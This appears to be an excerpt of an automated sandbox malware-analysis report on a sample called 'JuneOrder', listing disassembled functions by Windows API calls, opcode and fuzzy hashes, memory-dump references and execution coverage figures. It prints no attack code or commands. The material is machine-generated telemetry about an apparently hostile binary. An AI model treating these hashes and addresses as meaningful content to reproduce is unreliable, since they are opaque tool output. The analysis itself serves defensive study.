                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWidemalloc
                                        • String ID:
                                        • API String ID: 2735977093-0
                                        • Opcode ID: 00a490c9ef2dc5a478e4fad7c5361c88d21327c35d3ed7742fb63e43f6d77948
                                        • Instruction ID: ba92e613a2f9bf0a88025da3432e472bc54701246ba04d0c993b0b67be8a7a27
                                        • Opcode Fuzzy Hash: 00a490c9ef2dc5a478e4fad7c5361c88d21327c35d3ed7742fb63e43f6d77948
                                        • Instruction Fuzzy Hash: 9401F57B38130137E3205695AC42FBB7B59CB81B95F1900BAFB05AE2C1D6F76814C6B9
                                        APIs
                                        • SHGetFolderLocation.SHELL32(00000000,02259F70,00000000,00000000,00000000,00000000,00000000,?,00000104,0040A91B,00000000,00000000,00000104,?), ref: 0040A97E
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040A98F
                                        • wcslen.MSVCRT ref: 0040A99A
                                        • CoTaskMemFree.OLE32(00000000,?,00000104,0040A91B,00000000,00000000,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000), ref: 0040A9B8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: FolderFreeFromListLocationPathTaskwcslen
                                        • String ID:
                                        • API String ID: 4012708801-0
                                        • Opcode ID: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
                                        • Instruction ID: 15676ea375ba95ce47a4ad1d62f3a4f85f84cc5ccd71b7d74cdbb22097095955
                                        • Opcode Fuzzy Hash: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
                                        • Instruction Fuzzy Hash: 51F0D136610614BAC7205B6ADD08DAB7B78EF06660B414126F805E6250E7308920C7E5
                                        APIs
                                          • Part of subcall function 004053EA: EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 004053F5
                                          • Part of subcall function 004053EA: LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405428
                                        • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
                                        • EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
                                        • CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405472
                                          • Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B
                                        • LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
                                        • String ID:
                                        • API String ID: 85618057-0
                                        • Opcode ID: a2b12058037983e8feb28cac182eb15ba2e3b37f6182c0419abf98dc8b579576
                                        • Instruction ID: 3069acd899a723a1849542c16efb52ddeba99d38bb4cb8d15d413c759c742d3e
                                        • Opcode Fuzzy Hash: a2b12058037983e8feb28cac182eb15ba2e3b37f6182c0419abf98dc8b579576
                                        • Instruction Fuzzy Hash: CDF05432905610AFC2205F619C48AE77B79EF54767715843FF94573190D73868408E6E
                                        APIs
                                          • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                          • Part of subcall function 00405EB0: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405F01
                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02250000,00000000,?), ref: 0040DEF9
                                          • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02250000,00000000,?,?), ref: 0040DF1C
                                          • Part of subcall function 00402E9D: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402EC5
                                          • Part of subcall function 00402E9D: __fprintf_l.LIBCMT ref: 00402F1F
                                          • Part of subcall function 00409355: CoInitialize.OLE32(00000000), ref: 00409373
                                          • Part of subcall function 00409355: memset.MSVCRT ref: 00409381
                                          • Part of subcall function 00409355: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                                          • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                                          • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                                          • Part of subcall function 00409355: wcsncpy.MSVCRT ref: 004093DD
                                          • Part of subcall function 00409355: wcslen.MSVCRT ref: 004093F1
                                          • Part of subcall function 00409355: CoTaskMemFree.OLE32(?), ref: 0040947A
                                          • Part of subcall function 00409355: wcslen.MSVCRT ref: 00409481
                                          • Part of subcall function 00409355: FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                                          • Part of subcall function 00403CD7: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A61,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403D07
                                        • PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 004031CC
                                          • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                        • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,02259DD0,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 00403231
                                          • Part of subcall function 00402CA9: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402D44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUpper__fprintf_lmemsetwcsncpy
                                        • String ID: $pA
                                        • API String ID: 790731606-4007739358
                                        • Opcode ID: fafddd55d836537589261c709968970c6775ae1a276d84be64f2893e19f462a9
                                        • Instruction ID: fee6f31afef46dfc3d4b18dc130868db542cea1a9d30875f0fa626089c73850b
                                        • Opcode Fuzzy Hash: fafddd55d836537589261c709968970c6775ae1a276d84be64f2893e19f462a9
                                        • Instruction Fuzzy Hash: E151F6B5904A007EE2007BF2DD82E3F266EDFD4719B10893FF844B9092C93C994DA66D
                                        APIs
                                        • GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004025A3
                                        • PathRemoveArgsW.SHLWAPI(?), ref: 004025D9
                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02250000,00000000,?), ref: 0040DEF9
                                          • Part of subcall function 004098C0: SetEnvironmentVariableW.KERNEL32(02259F70,02259F70,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                          • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                          • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                          • Part of subcall function 0040DF50: HeapFree.KERNEL32(02250000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
                                        • String ID: *pA
                                        • API String ID: 1199808876-3833533140
                                        • Opcode ID: d71b0a94e292aaa5df852a5f67a936174220f907fb1fd7f815eb7f58dc0b4ad1
                                        • Instruction ID: 21a80edfc212e2aa9d277187ee9bfa0e7f9d15baa35618845dd156f20ee28a4c
                                        • Opcode Fuzzy Hash: d71b0a94e292aaa5df852a5f67a936174220f907fb1fd7f815eb7f58dc0b4ad1
                                        • Instruction Fuzzy Hash: 6C412DB5904701AED600BBB2DD8293F77ADEBD4309F108D3FF544A9092CA3CD849966E
                                        APIs
                                          • Part of subcall function 0040D2E8: TlsGetValue.KERNEL32(?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D2EF
                                          • Part of subcall function 0040D2E8: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D30A
                                          • Part of subcall function 0040D2E8: TlsSetValue.KERNEL32(00000000,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D319
                                        • GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409870,00000000,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 00409754
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: Value$AllocCommandHeapLine
                                        • String ID: $"
                                        • API String ID: 1339485270-3817095088
                                        • Opcode ID: 23df4b233d713070fc482b77f76cf6363686a3a5707749b1e186b32a761d8b54
                                        • Instruction ID: ab659b79707db7d7869a667e669445cd4c695224699636d93eb587c6e0e94742
                                        • Opcode Fuzzy Hash: 23df4b233d713070fc482b77f76cf6363686a3a5707749b1e186b32a761d8b54
                                        • Instruction Fuzzy Hash: 4A31A7735252218ADB74AF10981127772A1EFA2B60F18C17FE4926B3D2F37D8D41D369
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: _wcsicmpwcscmp
                                        • String ID: $0A
                                        • API String ID: 3419221977-513306843
                                        • Opcode ID: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                                        • Instruction ID: ce5e94a217663c04e8d70dd0a479d34a80eb67d33ce446282a7f9ad79867738e
                                        • Opcode Fuzzy Hash: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                                        • Instruction Fuzzy Hash: 2E11C476108B0A8FD3209F46D440923B3E9EF94364720843FD849A3791DB75FC218B6A
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405722
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405746
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide
                                        • String ID: $0A
                                        • API String ID: 626452242-513306843
                                        • Opcode ID: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
                                        • Instruction ID: 257aa3cf1744ec2ccb71e28fb2e26357a5123011e6015fa77bf79efc500ed16d
                                        • Opcode Fuzzy Hash: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
                                        • Instruction Fuzzy Hash: 16F0393A3862213BE230215A6C0AF672A69CB86F71F2542327B24BF2D085B5680046AC
                                        APIs
                                        • EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?), ref: 0040D593
                                        • HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?), ref: 0040D648
                                        • HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000), ref: 0040D66B
                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?), ref: 0040D6C3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: AllocCriticalHeapSection$EnterLeave
                                        • String ID:
                                        • API String ID: 830345296-0
                                        • Opcode ID: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
                                        • Instruction ID: 88038414d57a756cd7fad5c0050c74a6e8d04d69e7cdc083c9acd98434601a7e
                                        • Opcode Fuzzy Hash: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
                                        • Instruction Fuzzy Hash: 9C51E370A00B069FC324CF69D980926B7F5FF587103148A3EE89A97B90D335F959CB94
                                        APIs
                                        • wcslen.MSVCRT ref: 0040E145
                                        • HeapAlloc.KERNEL32(02250000,00000000,0000000A), ref: 0040E169
                                        • HeapReAlloc.KERNEL32(02250000,00000000,00000000,0000000A), ref: 0040E18D
                                        • HeapFree.KERNEL32(02250000,00000000,00000000,?,?,0040506F,?,0041702E,00401095,00000000), ref: 0040E1C4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: Heap$Alloc$Freewcslen
                                        • String ID:
                                        • API String ID: 2479713791-0
                                        • Opcode ID: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
                                        • Instruction ID: 6002b1c3f5819bc59b30070f24097f674b8c445c60846b79d2129d941eb5fd7b
                                        • Opcode Fuzzy Hash: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
                                        • Instruction Fuzzy Hash: BA21F774604209EFDB14CF94D884FAAB7BAEB48354F108569F9099F390D735EA81CF94
                                        APIs
                                        • EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
                                        • HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040D4E3
                                        • LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E
                                          • Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: AllocCriticalHeapSection$EnterLeave
                                        • String ID:
                                        • API String ID: 830345296-0
                                        • Opcode ID: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
                                        • Instruction ID: 44ceb6562d1eb3065d03cece85d0244f92a2e0345c3169311120ea74ede9abb0
                                        • Opcode Fuzzy Hash: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
                                        • Instruction Fuzzy Hash: 0A113D72604600AFC3208FA8DC40E56B7F9FB48325B14892EE896E36A1C734F804CF65
                                        APIs
                                        • EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D6EF
                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D706
                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D722
                                        • LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D73F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: CriticalFreeHeapSection$EnterLeave
                                        • String ID:
                                        • API String ID: 1298188129-0
                                        • Opcode ID: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
                                        • Instruction ID: 19831624efecdb95f34469d84cf285095463f1f7ead1137181efdd2e3cba2855
                                        • Opcode Fuzzy Hash: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
                                        • Instruction Fuzzy Hash: CB012879A0161AAFC7208F96ED04967BB7CFB49751305853AA844A7A60C734E824DFE8
                                        APIs
                                          • Part of subcall function 0040A11A: memset.MSVCRT ref: 0040A182
                                          • Part of subcall function 0040D946: EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
                                          • Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8
                                          • Part of subcall function 0040D946: LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF
                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
                                        • HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
                                        • HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                        • String ID:
                                        • API String ID: 4254243056-0
                                        • Opcode ID: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
                                        • Instruction ID: 731859a3b15cae5753bb7de1e8a6b13bc7caaa2a8ebc947d3a100cd7cc498ee7
                                        • Opcode Fuzzy Hash: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
                                        • Instruction Fuzzy Hash: ABF04471215109BFC6115F16DD40D57BF6DFF8A7A43424129B40493571CB36EC20AAA8

                                        Execution Graph

                                        Execution Coverage:14.7%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:76
                                        Total number of Limit Nodes:7
